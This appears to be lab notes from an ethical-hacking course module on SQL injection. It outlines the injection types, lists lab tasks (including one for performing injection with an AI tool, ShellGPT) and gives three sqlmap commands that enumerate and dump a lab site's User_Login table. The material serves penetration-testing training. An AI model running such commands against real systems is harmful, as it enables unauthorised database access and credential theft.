Module 15:SQL Injection
SQL injection attacks can be performed using various techniques to view, manipulate, insert, and delete data from an application’s database. There are three main types of SQL injection:
In-band SQL injection: An attacker uses the same communication channel to perform the attack and retrieve the results
Blind/inferential SQL injection: An attacker has no error messages from the system with which to work, but rather simply sends a malicious SQL query to the database
Out-of-band SQL injection: An attacker uses different communication channels (such as database email functionality, or file writing and loading functions) to perform the attack and obtain the results
Ethical hackers or pen testers use numerous tools and techniques to perform SQL injection attacks on target web applications. The recommended labs that will assist you in learning various SQL injection techniques include:
Perform SQL injection attacks
Perform an SQL injection attack against MSSQL to extract databases using sqlmap
Detect SQL injection vulnerabilities using various SQL injection detection tools
Detect SQL injection vulnerabilities using OWASP ZAP
Perform SQL injection using AI
Perform SQL injection using ShellGPT
Lab 1: Perform SQL Injection Attacks
Task 1: Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap
## Tools used in this section :
1. SQLmap
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie]" --dbs
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie]" -D moviescope --tables
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie]" -D moviescope -T User_Login --dump Lab 2: Detect SQL Injection Vulnerabilities using Various SQL Injection Detection Tools
Task 1: Detect SQL Injection Vulnerabilities using OWASP ZAP
## Tools used in this section :
1. ZaproxyLast updated